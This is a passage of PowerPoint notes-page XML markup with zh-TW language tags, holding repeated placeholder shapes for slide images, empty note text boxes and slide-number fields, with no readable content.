              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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42" name="Shape 342"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Shape 344"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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50" name="Shape 350"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Shape 351"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="352" name="Shape 352"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Shape 353"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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2" name="Shape 92"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335587" cy="4467224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Shape 94"/>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59" name="Shape 359"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Shape 361"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="362" name="Shape 362"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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67" name="Shape 367"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Shape 368"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Shape 369"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="370" name="Shape 370"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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75" name="Shape 375"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378" name="Shape 378"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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83" name="Shape 383"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 384"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Shape 385"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Shape 386"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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91" name="Shape 391"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="392" name="Shape 392"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 393"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394" name="Shape 394"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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99" name="Shape 399"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="400" name="Shape 400"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25400" y="744537"/>
            <a:ext cx="6618300" cy="3724200"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="120000" w="120000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120000" y="120000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 401"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666750" y="4716462"/>
            <a:ext cx="5335500" cy="4467300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Shape 402"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890800" cy="496800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>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07" name="Shape 407"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="408" name="Shape 408"/>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409" name="Shape 409"/>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SzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Shape 410"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776662" y="9429750"/>
            <a:ext cx="2890836" cy="496887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45850" lIns="91700" rIns="91700" tIns="45850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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15" name="Shape 415"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
